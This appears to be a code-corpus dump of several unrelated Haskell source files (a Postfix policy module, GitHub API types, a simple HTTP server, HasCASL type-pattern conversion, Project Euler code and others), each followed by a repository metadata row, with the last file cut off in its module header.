first9Primes = array (1,9) (zip [1..9] [2,3,5,7,11,13,17,19,23])
nthPrime n = first9Primes ! n
| ladinu/cs457 | src/CreatingFunctions.hs | mit | 1,732 | 0 | 9 | 579 | 749 | 424 | 325 | 46 | 1 |
{-# LANGUAGE OverloadedStrings #-}
-----------------------------------------------------------------------------
-- |
-- Module : Network.Policy.Action
-- Copyright : (c) 2014 Stefan Bühler
-- License : MIT-style (see the file COPYING)
--
-- Maintainer : stbuehler@web.de
-- Stability : experimental
-- Portability : portable
--
-- Type for the policy "action=..." response data.
--
-----------------------------------------------------------------------------
module Network.Policy.Action
( PolicyAction(..)
, policyActionText
) where
import qualified Data.Text as T
-- | Action to return as the response to a policy request; for the basic
-- actions see <http://www.postfix.org/access.5.html>. To execute complex
-- actions in postfix use "smtpd_restriction_classes" and return the name
-- of your class.
data PolicyAction
    = Policy_Accept                  -- rendered as "OK"
    | Policy_Accept_Num Int          -- numeric accept, 200..299
    | Policy_Defer T.Text
    | Policy_Defer_Num Int T.Text    -- 400..499, message must be non-empty
    | Policy_Reject T.Text
    | Policy_Reject_Num Int T.Text   -- 500..599, message must be non-empty
    | Policy_Defer_If_Reject T.Text
    | Policy_Defer_If_Permit T.Text
    | Policy_Pass                    -- rendered as "DUNNO"
    | Policy_RAW T.Text              -- raw passthrough
    deriving (Eq)
-- Debug-oriented Show: renderings hint at which constructor was used
-- (the parenthesized tags are not valid protocol output).
instance Show PolicyAction where
    show Policy_Accept = "OK"
    show (Policy_Accept_Num code) = "(ok) " ++ show code
    show (Policy_Defer msg) = "DEFER " ++ T.unpack msg
    show (Policy_Defer_Num code msg) = "(defer) " ++ show code ++ " " ++ T.unpack msg
    show (Policy_Reject msg) = "REJECT " ++ T.unpack msg
    show (Policy_Reject_Num code msg) = "(reject) " ++ show code ++ " " ++ T.unpack msg
    show (Policy_Defer_If_Reject msg) = "DEFER_IF_REJECT " ++ T.unpack msg
    show (Policy_Defer_If_Permit msg) = "DEFER_IF_PERMIT " ++ T.unpack msg
    show Policy_Pass = "DUNNO"
    show (Policy_RAW raw) = "(raw) " ++ T.unpack raw
-- | Build the action string from a 'PolicyAction' (the value returned in
-- the "action" response parameter). Out-of-range numeric codes and empty
-- messages for numbered defer/reject are reported via 'fail' in the
-- caller's monad.
-- NOTE(review): 'fail' with only a 'Monad' constraint predates
-- MonadFail; on modern GHC this needs a MonadFail constraint instead.
policyActionText :: Monad m => PolicyAction -> m T.Text
policyActionText action = case action of
    Policy_Accept -> return "OK"
    Policy_Accept_Num code
        | code >= 200 && code <= 299 -> return (T.pack (show code))
        | otherwise -> fail ("Invalid code for OK: " ++ show code)
    Policy_Defer msg -> return (keyword "DEFER" msg)
    Policy_Defer_Num code msg -> numbered "DEFER" "defer" 400 499 code msg
    Policy_Reject msg -> return (keyword "REJECT" msg)
    Policy_Reject_Num code msg -> numbered "REJECT" "reject" 500 599 code msg
    Policy_Defer_If_Reject msg -> return (keyword "DEFER_IF_REJECT" msg)
    Policy_Defer_If_Permit msg -> return (keyword "DEFER_IF_PERMIT" msg)
    Policy_Pass -> return "DUNNO"
    Policy_RAW raw -> return raw
  where
    -- Keyword alone when the message is empty, "KEYWORD msg" otherwise.
    keyword kw msg
        | T.null msg = kw
        | otherwise = T.concat [kw, " ", msg]
    -- Numbered form: validate the code range first, then require a
    -- non-empty message (same order of checks as before).
    numbered kwUpper kwLower lo hi code msg
        | code < lo || code > hi =
            fail ("Invalid code for " ++ kwUpper ++ ": " ++ show code)
        | T.null msg = fail ("Empty message for " ++ kwLower ++ " code")
        | otherwise = return (T.concat [T.pack (show code), " ", msg])
| stbuehler/haskell-mail-policy | src/Network/Policy/Action.hs | mit | 3,468 | 28 | 11 | 696 | 912 | 484 | 428 | 49 | 10 |
{-# OPTIONS_GHC -Wall #-}
module Main where
import Protolude
import Test.Tasty (TestTree, testGroup, defaultMain)
import Test.DocTest
-- | Run the doctests for the words app, then the (currently empty)
-- tasty suite.
main :: IO ()
main = doctest ["app/words.lhs"] >> defaultMain tests

-- | Placeholder test tree; no cases yet.
tests :: TestTree
tests = testGroup "" []
| tonyday567/sfold | words/test/test.hs | mit | 269 | 0 | 8 | 60 | 76 | 42 | 34 | 13 | 1 |
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE EmptyDataDecls #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE MultiParamTypeClasses #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE QuasiQuotes #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE TypeFamilies #-}
module Kashmir.Github.Types where
import Control.Lens
import Data.Aeson
import Data.Aeson.Casing
import Data.Aeson.TH
import Data.Text hiding (drop)
import Data.Time
import Database.Persist
import Database.Persist.TH
import GHC.Generics
import Kashmir.Aeson
import Kashmir.Email
import Kashmir.Github.Types.Common
-- Persistent schema for the GitHub mirror tables. mpsGenerateLenses
-- means accessors are generated as lenses with a leading underscore
-- (e.g. _githubUserLogin), which the JSON instances below rely on.
-- All tables use natural primary keys (login / owner+name / hook id),
-- and the hook table carries a foreign key to its repository.
share [mkPersist sqlSettings {mpsGenerateLenses = True}
      ,mkMigrate "migrateGithub"]
      [persistLowerCase|
  GithubUser
    login Text sqltype=text
    avatarUrl URL sqltype=text
    gravatarId URL Maybe sqltype=text
    url URL sqltype=text
    htmlUrl URL sqltype=text
    followersUrl URL sqltype=text
    followingUrl URL sqltype=text
    gistsUrl URL sqltype=text
    starredUrl URL sqltype=text
    subscriptionsUrl URL sqltype=text
    organizationsUrl URL sqltype=text
    reposUrl URL sqltype=text
    eventsUrl URL sqltype=text
    receivedEventsUrl URL sqltype=text
    siteAdmin Bool
    name Text Maybe sqltype=text
    company Text Maybe sqltype=text
    blog Text Maybe sqltype=text
    location Text Maybe sqltype=text
    email Email
    hireable Bool
    bio Text Maybe sqltype=text
    publicRepos Int
    publicGists Int
    followers Int
    following Int
    createdAt UTCTime
    updatedAt UTCTime
    Primary login
    deriving Read Show Eq Generic
  GithubRepository
    ownerLogin Text sqltype=text
    name Text sqltype=text
    description Text Maybe sqltype=text
    private Bool
    fork Bool
    url URL sqltype=text
    htmlUrl URL sqltype=text
    archiveUrl URL sqltype=text
    assigneesUrl URL sqltype=text
    blobsUrl URL sqltype=text
    branchesUrl URL sqltype=text
    cloneUrl URL sqltype=text
    collaboratorsUrl URL sqltype=text
    commentsUrl URL sqltype=text
    commitsUrl URL sqltype=text
    compareUrl URL sqltype=text
    contentsUrl URL sqltype=text
    contributorsUrl URL sqltype=text
    deploymentsUrl URL sqltype=text
    downloadsUrl URL sqltype=text
    eventsUrl URL sqltype=text
    forksUrl URL sqltype=text
    gitCommitsUrl URL sqltype=text
    gitRefsUrl URL sqltype=text
    gitTagsUrl URL sqltype=text
    gitUrl URL sqltype=text
    hooksUrl URL sqltype=text
    issueCommentUrl URL sqltype=text
    issueEventsUrl URL sqltype=text
    issuesUrl URL sqltype=text
    keysUrl URL sqltype=text
    labelsUrl URL sqltype=text
    languagesUrl URL sqltype=text
    mergesUrl URL sqltype=text
    milestonesUrl URL sqltype=text
    mirrorUrl URL Maybe sqltype=text
    notificationsUrl URL sqltype=text
    pullsUrl URL sqltype=text
    releasesUrl URL sqltype=text
    sshUrl URL sqltype=text
    stargazersUrl URL sqltype=text
    statusesUrl URL sqltype=text
    subscribersUrl URL sqltype=text
    subscriptionUrl URL sqltype=text
    svnUrl URL sqltype=text
    tagsUrl URL sqltype=text
    teamsUrl URL sqltype=text
    treesUrl URL sqltype=text
    homepage URL Maybe sqltype=text
    language Text Maybe sqltype=text
    forksCount Int
    stargazersCount Int
    watchersCount Int
    size Int
    defaultBranch Text sqltype=text
    openIssuesCount Int
    hasIssues Bool
    hasWiki Bool
    hasPages Bool
    hasDownloads Bool
    pushedAt UTCTime
    createdAt UTCTime
    updatedAt UTCTime
    Primary ownerLogin name
    deriving Show Eq Generic
  GithubOrganization
    login Text sqltype=text
    url URL sqltype=text
    reposUrl URL sqltype=text
    eventsUrl URL sqltype=text
    hooksUrl URL sqltype=text
    issuesUrl URL sqltype=text
    membersUrl URL sqltype=text
    publicMembersUrl URL sqltype=text
    avatarUrl URL sqltype=text
    description Text Maybe sqltype=text
    Primary login
    deriving Read Show Eq Generic
  GithubRepositoryHook
    githubRepositoryHookId Int
    githubRepositoryOwnerLogin Text sqltype=text
    githubRepositoryName Text sqltype=text
    url URL sqltype=text
    testUrl URL sqltype=text
    pingUrl URL sqltype=text
    name Text sqltype=text
    -- "events": [
    --   "push",
    --   "pull_request"
    -- ],
    active Bool
    -- "config": {
    --   "url": "http://example.com/webhook",
    --   "content_type": "json"
    -- },
    updatedAt UTCTime
    createdAt UTCTime
    Primary githubRepositoryHookId
    Foreign GithubRepository fk_hook_parent githubRepositoryOwnerLogin githubRepositoryName
    deriving Show Eq Generic
|]
-- | JSON decoding for 'GithubUser' via the generic instance: lens-style
-- field prefixes are snake_cased and stripped
-- ("_githubUserAvatarUrl" -> "avatar_url"); the synthetic key field
-- maps to GitHub's "id".
instance FromJSON GithubUser where
  parseJSON = genericParseJSON options
    where
      options = defaultOptions { fieldLabelModifier = rename }
      rename "_githubUserGithubUserId" = "id"
      -- drop 13 == length "_github_user_" after snake-casing
      rename s = drop 13 (snakeCase s)

-- | Same scheme for 'GithubOrganization'
-- ("_github_organization_" is 21 characters).
instance FromJSON GithubOrganization where
  parseJSON = genericParseJSON options
    where
      options = defaultOptions { fieldLabelModifier = rename }
      rename "_githubOrganizationGithubOrganizationId" = "id"
      rename s = drop 21 (snakeCase s)
-- | Decode a repository object by hand: the owner login comes from the
-- nested "owner" object, every other field from a top-level key
-- (RecordWildCards assembles the record from the bindings below).
instance FromJSON GithubRepository where
  parseJSON = withObject "repository" $ \o -> do
    owner <- o .: "owner"
    _githubRepositoryOwnerLogin <- owner .: "login"
    _githubRepositoryName <- o .: "name"
    _githubRepositoryDescription <- o .: "description"
    _githubRepositoryPrivate <- o .: "private"
    _githubRepositoryFork <- o .: "fork"
    _githubRepositoryUrl <- o .: "url"
    _githubRepositoryHtmlUrl <- o .: "html_url"
    _githubRepositoryArchiveUrl <- o .: "archive_url"
    _githubRepositoryAssigneesUrl <- o .: "assignees_url"
    _githubRepositoryBlobsUrl <- o .: "blobs_url"
    _githubRepositoryBranchesUrl <- o .: "branches_url"
    _githubRepositoryCloneUrl <- o .: "clone_url"
    _githubRepositoryCollaboratorsUrl <- o .: "collaborators_url"
    _githubRepositoryCommentsUrl <- o .: "comments_url"
    _githubRepositoryCommitsUrl <- o .: "commits_url"
    _githubRepositoryCompareUrl <- o .: "compare_url"
    _githubRepositoryContentsUrl <- o .: "contents_url"
    _githubRepositoryContributorsUrl <- o .: "contributors_url"
    _githubRepositoryDeploymentsUrl <- o .: "deployments_url"
    _githubRepositoryDownloadsUrl <- o .: "downloads_url"
    _githubRepositoryEventsUrl <- o .: "events_url"
    _githubRepositoryForksUrl <- o .: "forks_url"
    _githubRepositoryGitCommitsUrl <- o .: "git_commits_url"
    _githubRepositoryGitRefsUrl <- o .: "git_refs_url"
    _githubRepositoryGitTagsUrl <- o .: "git_tags_url"
    _githubRepositoryGitUrl <- o .: "git_url"
    _githubRepositoryHooksUrl <- o .: "hooks_url"
    _githubRepositoryIssueCommentUrl <- o .: "issue_comment_url"
    _githubRepositoryIssueEventsUrl <- o .: "issue_events_url"
    _githubRepositoryIssuesUrl <- o .: "issues_url"
    _githubRepositoryKeysUrl <- o .: "keys_url"
    _githubRepositoryLabelsUrl <- o .: "labels_url"
    _githubRepositoryLanguagesUrl <- o .: "languages_url"
    _githubRepositoryMergesUrl <- o .: "merges_url"
    _githubRepositoryMilestonesUrl <- o .: "milestones_url"
    _githubRepositoryMirrorUrl <- o .: "mirror_url"
    _githubRepositoryNotificationsUrl <- o .: "notifications_url"
    _githubRepositoryPullsUrl <- o .: "pulls_url"
    _githubRepositoryReleasesUrl <- o .: "releases_url"
    _githubRepositorySshUrl <- o .: "ssh_url"
    _githubRepositoryStargazersUrl <- o .: "stargazers_url"
    _githubRepositoryStatusesUrl <- o .: "statuses_url"
    _githubRepositorySubscribersUrl <- o .: "subscribers_url"
    _githubRepositorySubscriptionUrl <- o .: "subscription_url"
    _githubRepositorySvnUrl <- o .: "svn_url"
    _githubRepositoryTagsUrl <- o .: "tags_url"
    _githubRepositoryTeamsUrl <- o .: "teams_url"
    _githubRepositoryTreesUrl <- o .: "trees_url"
    _githubRepositoryHomepage <- o .: "homepage"
    _githubRepositoryLanguage <- o .: "language"
    _githubRepositoryForksCount <- o .: "forks_count"
    _githubRepositoryStargazersCount <- o .: "stargazers_count"
    _githubRepositoryWatchersCount <- o .: "watchers_count"
    _githubRepositorySize <- o .: "size"
    _githubRepositoryDefaultBranch <- o .: "default_branch"
    _githubRepositoryOpenIssuesCount <- o .: "open_issues_count"
    _githubRepositoryHasIssues <- o .: "has_issues"
    _githubRepositoryHasWiki <- o .: "has_wiki"
    _githubRepositoryHasPages <- o .: "has_pages"
    _githubRepositoryHasDownloads <- o .: "has_downloads"
    _githubRepositoryPushedAt <- o .: "pushed_at"
    _githubRepositoryCreatedAt <- o .: "created_at"
    _githubRepositoryUpdatedAt <- o .: "updated_at"
    return GithubRepository {..}
-- | A hook payload exactly as GitHub returns it, before being keyed to
-- a repository (see 'fromRaw'). JSON keys are the snake_cased field
-- names, except "id" which maps to 'hookId'.
data RawRepositoryHook = RawRepositoryHook
  { hookId :: Int
  , url :: URL
  , testUrl :: URL
  , pingUrl :: URL
  , name :: Text
  , active :: Bool
  , createdAt :: UTCTime
  , updatedAt :: UTCTime
  } deriving (Show, Eq, Generic)

instance FromJSON RawRepositoryHook where
  parseJSON = genericParseJSON options
    where
      options = defaultOptions { fieldLabelModifier = rename }
      rename "hookId" = "id"
      rename s = snakeCase s
-- Generic encoders; field names pass through unmodified (with the
-- lens-style underscore prefix), unlike the hand-rolled decoders above.
instance ToJSON GithubRepository
instance ToJSON GithubRepositoryHook
-- | Attach a raw hook to its owning repository (owner login + repo
-- name), producing the persistent entity value field by field.
fromRaw :: Text -> Text -> RawRepositoryHook -> GithubRepositoryHook
fromRaw ownerLogin repoName RawRepositoryHook{..} = GithubRepositoryHook
  { _githubRepositoryHookGithubRepositoryHookId = hookId
  , _githubRepositoryHookGithubRepositoryOwnerLogin = ownerLogin
  , _githubRepositoryHookGithubRepositoryName = repoName
  , _githubRepositoryHookUrl = url
  , _githubRepositoryHookTestUrl = testUrl
  , _githubRepositoryHookPingUrl = pingUrl
  , _githubRepositoryHookName = name
  , _githubRepositoryHookActive = active
  , _githubRepositoryHookCreatedAt = createdAt
  , _githubRepositoryHookUpdatedAt = updatedAt
  }
-- | Opaque OAuth access token; stored and serialized as plain text.
newtype AccessToken = AccessToken { _token :: Text}
  deriving (Show,Read,Eq,Generic)
makeLenses ''AccessToken
-- Persist as a text column; any non-text persist value is rejected.
instance PersistField AccessToken where
  toPersistValue = PersistText . view token
  fromPersistValue (PersistText t) = Right $ AccessToken t
  fromPersistValue _ = Left "Not a text persist type"
-- JSON form is the bare string, not an object.
instance FromJSON AccessToken where
  parseJSON = withText "AccessToken" $ return . AccessToken
instance ToJSON AccessToken where
  toJSON (AccessToken t) = toJSON t
-- | Response from GitHub's OAuth access-token endpoint. The derived
-- JSON drops the underscore and snake-cases the rest
-- (access_token, scope, token_type).
data AccessTokenResponse = AccessTokenResponse
  { _accessToken :: AccessToken
  , _scope :: Text
  , _tokenType :: Text
  } deriving (Show,Eq,Generic)

makeLenses ''AccessTokenResponse

$(deriveJSON (aesonDrop 1 snakeCase)
  ''AccessTokenResponse)

-- | OAuth application configuration (client credentials and endpoints).
data Config = Config
  { _clientId :: String
  , _clientSecret :: String
  , _authUrl :: String
  , _accessUrl :: String
  } deriving (Eq,Show,Generic)

makeLenses ''Config

$(deriveJSON (dropPrefixJSONOptions "_")
  ''Config)
| krisajenkins/kashmir | src/Kashmir/Github/Types.hs | epl-1.0 | 12,593 | 48 | 22 | 3,918 | 1,248 | 667 | 581 | 174 | 1 |
--Smallest positive number divisible by [1..20]
-- | True iff every element of the list is True. This is exactly
-- Prelude's 'and' (short-circuits on the first False; True for []),
-- replacing the hand-rolled recursion with its 'x == False' test.
allTrue :: [Bool] -> Bool
allTrue = and
-- | Remainders of n against each divisor in the list; the manual
-- recursion is just 'map' with a section. The signature matches the
-- previously inferred type.
listModulus :: Integral a => a -> [a] -> [a]
listModulus n = map (n `mod`)
-- | Search upward from n in steps of 20 for the first number divisible
-- by everything in [11..20]. Checking only 11..20 suffices for the
-- "divisible by 1..20" goal because each of 2..10 divides some member
-- of 11..20 (16 covers 2,4,8; 18 covers 3,6,9; 20 covers 5,10; 14
-- covers 7). Guards replace the old case-on-Bool.
smallestDivis :: Integral a => a -> a
smallestDivis n
  | all (== 0) (map (n `mod`) [11 .. 20]) = n
  | otherwise = smallestDivis (n + 20)
-- | Print the answer (smallest positive number divisible by 1..20).
-- BUG FIX: the original was 'return $ smallestDivis 20', which computed
-- the value into IO and discarded it -- the program printed nothing.
main :: IO ()
main = print (smallestDivis 20)
| NaevaTheCat/Project-Euler-Haskell | P5.hs | gpl-2.0 | 418 | 1 | 9 | 108 | 185 | 94 | 91 | 14 | 2 |
--
-- Project: SHWS - Simple Haskell Web Server
-- Author: Petr Zemek <s3rvac@gmail.com>, 2009
--
-- | HTTP server.
module Server(run) where
import Prelude hiding (catch)
import Control.Concurrent
import Control.Exception
import Control.Monad
import Data.Maybe
import IO hiding (catch)
import Network
import Network.HTTP
import Network.HTTP.Headers
import Text.Regex.Posix
import System.Posix.Signals
import System.Timeout
import Common
import Log
import qualified RequestHandler
-- | Handle for HTTP connections.
-- NOTE(review): an orphan instance (Stream is from Network.HTTP, Handle
-- from System.IO); acceptable inside one executable, fragile in a library.
instance Stream Handle where
    -- Line reads re-append the newline stripped by hGetLine, as the
    -- HTTP parser expects; all results are wrapped in Right (no error
    -- mapping -- IO exceptions simply propagate).
    readLine h = hGetLine h >>= \l -> return $ Right $ l ++ "\n"
    readBlock h n = replicateM n (hGetChar h) >>= return . Right
    writeBlock h s = mapM_ (hPutChar h) s >>= return . Right
    close = hClose
-- | Put Header class into the Eq class (this is not done in the HTTP module).
-- Two headers are equal when both the name and the value match exactly.
instance Eq Header where
    (Header hn1 hv1) == (Header hn2 hv2) = hn1 == hn2 && hv1 == hv2
-- | Start the HTTP server: listen on the given port, serving files from
-- the server root directory (indexFile for directories), logging via the
-- given logger, and closing idle connections after the given number of
-- seconds (values <= 0 disable the timeout; see 'handleConnection').
run :: PortID -> String -> String -> Logger -> Int -> IO ()
run portNum serverRoot indexFile logger connTimeout = do
    -- Ignoring SIGPIPE keeps the server alive when a client closes
    -- its connection mid-response.
    installHandler sigPIPE Ignore $ Just fullSignalSet
    withSocketsDo $ do
        socket <- listenOn portNum
        acceptLoop socket `finally` sClose socket
  where
    acceptLoop socket =
        forever $ acceptConnection socket connTimeout $ handleConnection $
            RequestHandler.getRequestHandler serverRoot indexFile logger
-- | Accept one client connection and spawn a thread that runs the given
-- handler on (handle, peer host name, timeout).
acceptConnection :: Socket -> Int -> (Handle -> String -> Int -> IO ()) -> IO ThreadId
acceptConnection socket connTimeout handler = do
    (conn, hostName, _) <- accept socket
    -- Unbuffered I/O avoids stalls when handling persistent connections.
    hSetBuffering conn NoBuffering
    forkIO (handler conn hostName connTimeout)
-- | Serve requests on one client connection until an error, a receive
-- timeout, or the client stops asking for keep-alive; the handle is
-- always closed on the way out ('finally'), and every exception is
-- deliberately swallowed. hn is the client host name; a timeout to > 0
-- is applied (in seconds) to each request receive.
handleConnection :: RequestHandler.RequestHandler -> Handle -> String -> Int -> IO ()
handleConnection rh conn hn to =
    serve `catch` (\_ -> return ()) `finally` (close conn)
  where
    serve = do
        requestOrErr <- receiveRequest to conn
        if isTimeoutOrErr requestOrErr
            then close conn
            else do
                -- fromJust is safe here: the timeout/error case was
                -- handled in the branch above.
                let request = getEitherRight $ fromJust requestOrErr
                response <- rh request hn
                respondHTTP conn response
                -- Persistent connection: loop for the next request.
                if keepAlive request
                    then handleConnection rh conn hn to
                    else close conn
    isTimeoutOrErr r = isNothing r || isEitherLeft (fromJust r)
    -- HTTP/1.1 requests default to keep-alive unless "Connection: close"
    -- is present; older versions need an explicit keep-alive header.
    isHttp11 r = show r =~ "^[^\n]*HTTP/1.1\r\n.*$"
    hasKeepAlive (Request _ _ hs _) = elem (Header HdrConnection "keep-alive") hs
    hasConnClose (Request _ _ hs _) = elem (Header HdrConnection "close") hs
    keepAlive r = hasKeepAlive r || (isHttp11 r && not (hasConnClose r))
    receiveRequest t c =
        if t > 0
            -- 'timeout' wants microseconds, the parameter is in seconds.
            then timeout (t * 1000000) (receiveHTTP c)
            else fmap Just (receiveHTTP c)
-- End of file
| s3rvac/shws | src/Server.hs | gpl-2.0 | 4,507 | 0 | 16 | 1,554 | 872 | 449 | 423 | -1 | -1 |
{- |
Module : $Header$
Description : convert type patterns to type identifier applications
Copyright : (c) Christian Maeder and Uni Bremen 2002-2005
License : GPLv2 or higher, see LICENSE.txt
Maintainer : Christian.Maeder@dfki.de
Stability : provisional
Portability : portable
convert type patterns to type identifier applications
-}
module HasCASL.ConvertTypePattern
( toTypePattern
, convertTypePatterns
, convertTypePattern
) where
import Common.Lexer
import Common.Id
import Common.Result
import HasCASL.As
import HasCASL.AsUtils
import HasCASL.PrintAs ()
-- | Store an identifier application as a type pattern (with an empty
-- source range).
toTypePattern :: (Id, [TypeArg]) -> TypePattern
toTypePattern (i, tArgs) = TypePattern i tArgs nullRange
-- | Convert a list of type patterns, accumulating the diagnoses of every
-- element; patterns that fail to convert are dropped from the result
-- list (their 'Result' carries Nothing).
convertTypePatterns :: [TypePattern] -> Result [(Id, [TypeArg])]
convertTypePatterns ts = case ts of
  [] -> return []
  s : r -> let
    Result d m = convertTypePattern s
    -- This pattern match is safe: the case below always yields Just.
    Result ds (Just l) = convertTypePatterns r
    in Result (d ++ ds) $ Just $ case m of
       Nothing -> l
       Just i -> i : l
-- Shared error constructors for the converters below.
illegalTypePattern :: TypePattern -> Result a
illegalTypePattern = mkError "illegal type pattern"
illegalTypePatternArg :: TypePattern -> Result a
illegalTypePatternArg = mkError "illegal type pattern argument"
illegalTypeId :: TypePattern -> Result a
illegalTypeId = mkError "illegal type pattern identifier"
-- | Convert a single type pattern into an identifier plus its argument
-- list, recognizing prefix, infix (sign-character operator between two
-- arguments), mixfix-with-compound-ids, and bracketed forms.
convertTypePattern :: TypePattern -> Result (Id, [TypeArg])
convertTypePattern tp = case tp of
    -- Already converted: pass through.
    TypePattern t as _ -> return (t, as)
    TypePatternToken t ->
      if isPlace t then illegalTypePattern tp else return (simpleIdToId t, [])
    -- Three components: either "a <op> b" (infix, op starts with a sign
    -- character) or "t arg arg" (prefix with two arguments).
    -- NOTE(review): 'head $ tokStr inTok' assumes a non-empty token
    -- string -- presumably guaranteed by the scanner.
    MixfixTypePattern [ra, ri@(TypePatternToken inTok), rb] ->
      if isSignChar $ head $ tokStr inTok
      then let inId = Id [Token place $ getRange ra, inTok,
                          Token place $ getRange rb] [] nullRange
           in case (ra, rb) of
              (TypePatternToken (Token "__" _),
               TypePatternToken (Token "__" _)) -> return (inId, [])
              _ -> do a <- convertToTypeArg ra
                      b <- convertToTypeArg rb
                      return (inId, [a, b])
      else case ra of
           TypePatternToken t1 -> do
             a <- convertToTypeArg ri
             b <- convertToTypeArg rb
             return (simpleIdToId t1, [a, b])
           _ -> illegalTypePattern tp
    -- General mixfix: either "__ <op> __" or an identifier possibly
    -- followed by a compound list in squares and further arguments.
    MixfixTypePattern (TypePatternToken t1 : rp) ->
      if isPlace t1 then case rp of
         [TypePatternToken inId, TypePatternToken t2] ->
             if isPlace t2 && isSignChar (head $ tokStr inId)
             then return (Id [t1,inId,t2] [] nullRange, [])
             else illegalTypePattern tp
         _ -> illegalTypePattern tp
      else case rp of
         BracketTypePattern Squares as@(_:_) ps : rp2 -> do
           is <- mapM convertToId as
           rs <- mapM convertToTypeArg rp2
           return (Id [t1] is ps, rs)
         _ -> do
           as <- mapM convertToTypeArg rp
           return (simpleIdToId t1, as)
    -- A single bracketed pattern: parens are transparent; other brackets
    -- become a mixfix id "open __ close" with at most one argument.
    BracketTypePattern bk [ap] ps -> case bk of
      Parens -> convertTypePattern ap
      _ -> let (o, c) = getBrackets bk
               tid = Id [Token o ps, Token place $ getRange ap,
                         Token c ps] [] nullRange
        in case ap of
           TypePatternToken t -> if isPlace t then
               return (tid, [])
               else return (tid, [TypeArg (simpleIdToId t) NonVar MissingKind
                                  rStar 0 Other nullRange])
           _ -> do a <- convertToTypeArg ap
                   return (tid, [a])
    _ -> illegalTypePattern tp
-- | Convert a pattern in argument position: a plain (non-place) token
-- becomes a fresh non-variable argument with an unknown kind; an
-- explicit argument or a parenthesized argument is passed through.
convertToTypeArg :: TypePattern -> Result TypeArg
convertToTypeArg tp = case tp of
    TypePatternToken t -> if isPlace t then illegalTypePatternArg tp else
      return $ TypeArg (simpleIdToId t)
               NonVar MissingKind rStar 0 Other nullRange
    TypePatternArg a _ -> return a
    BracketTypePattern Parens [stp] _ -> convertToTypeArg stp
    _ -> illegalTypePatternArg tp
-- | Convert a pattern into a (possibly compound) identifier: tokens up
-- to the first square-bracket group become the id's tokens, the group
-- itself its compound list, and anything after it must be places.
convertToId :: TypePattern -> Result Id
convertToId tp = case tp of
    TypePatternToken t ->
      if isPlace t then illegalTypeId tp else return $ Id [t] [] nullRange
    MixfixTypePattern [] -> error "convertToId: MixfixTypePattern []"
    MixfixTypePattern (hd : tps) ->
     if null tps then convertToId hd
     else do
      let (toks, comps) = break ( \ p ->
            case p of BracketTypePattern Squares (_:_) _ -> True
                      _ -> False) tps
      ts <- mapM convertToToks (hd:toks)
      -- head/tail on comps are guarded by the null checks here.
      (is, ps) <- if null comps then return ([], nullRange)
                  else convertToIds $ head comps
      pls <- if null comps then return []
             else mapM convertToPlace $ tail comps
      return $ Id (concat ts ++ pls) is ps
    _ -> do
      ts <- convertToToks tp
      return $ Id ts [] nullRange
-- | Convert a non-empty square-bracket group into the compound
-- identifier list of an 'Id' (plus the group's range).
convertToIds :: TypePattern -> Result ([Id], Range)
convertToIds tp = case tp of
    BracketTypePattern Squares tps@(_ : _) ps -> do
      is <- mapM convertToId tps
      return (is, ps)
    _ -> illegalTypeId tp
-- | Flatten a type pattern into its raw tokens, wrapping a bracketed
-- sub-pattern in its opening and closing bracket tokens. Parens (and
-- any other unexpected form) are rejected as an illegal identifier.
convertToToks :: TypePattern -> Result [Token]
convertToToks tp = case tp of
    TypePatternToken t -> return [t]
    BracketTypePattern bk [stp] ps -> case bk of
      Parens -> illegalTypeId stp
      _ -> let [o, c] = mkBracketToken bk ps in do
          -- BUG FIX: recurse on the inner pattern stp, not on tp
          -- itself -- the latter looped forever on this same branch.
          ts <- convertToToks stp
          return (o : ts ++ [c])
    MixfixTypePattern tps -> do
      ts <- mapM convertToToks tps
      return $ concat ts
    _ -> illegalTypeId tp
-- | Accept only a place token ("__"); everything else is an illegal
-- identifier part.
convertToPlace :: TypePattern -> Result Token
convertToPlace (TypePatternToken t) | isPlace t = return t
convertToPlace tp = illegalTypeId tp
| nevrenato/Hets_Fork | HasCASL/ConvertTypePattern.hs | gpl-2.0 | 5,834 | 0 | 22 | 1,809 | 1,831 | 906 | 925 | 126 | 17 |
module Gabriel.Commands ( Command(..)
) where
import Data.Binary
-- | Messages exchanged over the control socket; the wire encoding lives
-- in the 'Binary' instance below. (The constructor names suggest their
-- intent; the semantics are implemented by the daemon, not shown here.)
data Command
  = UpdateCommand [String]
  | KillCommand
  | SigCommand String
  | Puts String
  | RestartCommand
  | CheckCommand
  | CommandOk
  | CommandError String
  deriving (Show)
-- Wire format: one tag byte, then the payload (if any). The tag values
-- are part of the protocol and must not change:
-- 0 update, 1 kill, 2 restart, 3 check, 4 signal, 25 puts,
-- 128 ok, 254 error. Unknown tags fail with a pattern-match error,
-- exactly as before.
instance Binary Command where
  put cmd = case cmd of
    UpdateCommand args -> putWord8 0 >> put args
    KillCommand -> putWord8 1
    RestartCommand -> putWord8 2
    CheckCommand -> putWord8 3
    SigCommand sig -> putWord8 4 >> put sig
    Puts msg -> putWord8 25 >> put msg
    CommandOk -> putWord8 128
    CommandError err -> putWord8 254 >> put err
  get = getWord8 >>= \tag -> case tag of
    0 -> fmap UpdateCommand get
    1 -> return KillCommand
    2 -> return RestartCommand
    3 -> return CheckCommand
    4 -> fmap SigCommand get
    25 -> fmap Puts get
    128 -> return CommandOk
    254 -> fmap CommandError get
| udoprog/gabriel | Gabriel/Commands.hs | gpl-3.0 | 1,106 | 0 | 15 | 397 | 377 | 190 | 187 | 31 | 0 |
-- -*-haskell-*-
-- Vision (for the Voice): an XMMS2 client.
--
-- Author: Oleg Belozeorov
-- Created: 13 Jul. 2010
--
-- Copyright (C) 2011 Oleg Belozeorov
--
-- This program is free software; you can redistribute it and/or
-- modify it under the terms of the GNU General Public License as
-- published by the Free Software Foundation; either version 3 of
-- the License, or (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-- General Public License for more details.
--
{-# LANGUAGE TypeOperators,
MultiParamTypeClasses,
FunctionalDependencies,
FlexibleInstances,
OverlappingInstances,
UndecidableInstances #-}
module Data.Env
( Env (..)
, mkEnv
, (:*:) (..)
, EnvX (..)
